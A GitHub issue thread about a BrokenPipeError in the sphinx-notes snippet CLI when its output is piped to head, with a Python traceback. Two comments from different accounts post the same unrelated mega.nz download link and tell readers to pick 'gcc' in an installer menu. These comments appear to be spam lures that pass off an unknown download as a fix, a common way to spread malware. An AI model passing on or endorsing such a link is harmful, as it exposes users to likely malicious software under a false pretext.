### ISSUE TITLE
Steaming stdout support

### ISSUE THREAD

**Issue by SilverRainZ** [sphinx-notes/snippet#25]
`snippet s | head -10`:

```
Traceback (most recent call last):
  File "/home/la/.local/bin/snippet", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/la/.local/lib/python3.12/site-packages/sphinxnotes/snippet/cli.py", line 185, in main
    args.func(args)
  File "/home/la/.local/lib/python3.12/site-packages/sphinxnotes/snippet/cli.py", line 211, in _on_command_list
    print(row)
BrokenPipeError: [Errno 32] Broken pipe
```

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
